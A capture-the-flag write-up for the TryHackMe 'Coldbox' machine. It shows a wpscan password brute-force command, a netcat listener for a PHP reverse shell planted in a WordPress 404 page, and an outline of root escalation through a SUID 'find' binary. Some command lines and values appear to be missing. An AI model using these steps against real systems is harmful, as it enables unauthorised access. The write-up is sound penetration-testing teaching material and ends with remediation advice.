This is a writeup for “Coldbox”. “Coldbox” is a boot2root machine on TryHackMe. During playing this box you have to collect 2 flags.
During enumeration we can see that Wordpress is running on port 80.
Next we can use
wpscan to enumerate the users. I have saved these users into a file called “users.txt”. With the users list we can start a bruteforce attack. The following command will use the “rockyou.txt” wordlist to perform the brute force.
wpscan --url http://10.10.45.254/ -U users.txt -P /usr/share/wordlists/rockyou.txt
This bruteforce was successful. We could get the password for the user
Fortunatly, the user “C0ldd” can edit pages. We will change the 404 page with a reverse shell. I have used the PHP reverse shell from Pentestmonkey. You have to change the IP field to your attacker machine’s
tun0 IP. After that we have to start a Netcat listener on port 1234:
nc -lvnp 1234.
After getting a reverse shell we are logged in as “www-data”. The next step is to find a way to escalate our privileges to “root”. For this purpose we could search for misconfigured SUID binaries. The following “find” command will list all binaries that have the SUID bit set. Interestingly, the “find” command has the SUID bit set and is owned by “root”. This can be abused to gain a “root” shell.
find command will spawn a root shell:
Finally, we can read the root flag.
The password policy should prevent using too common and easy to guess passwords. The user
C0lddshoud change the wordpress password to something more complex. Also misconfigurations with the SUID bit should be avoided. The
find command should not have the SUID bit set.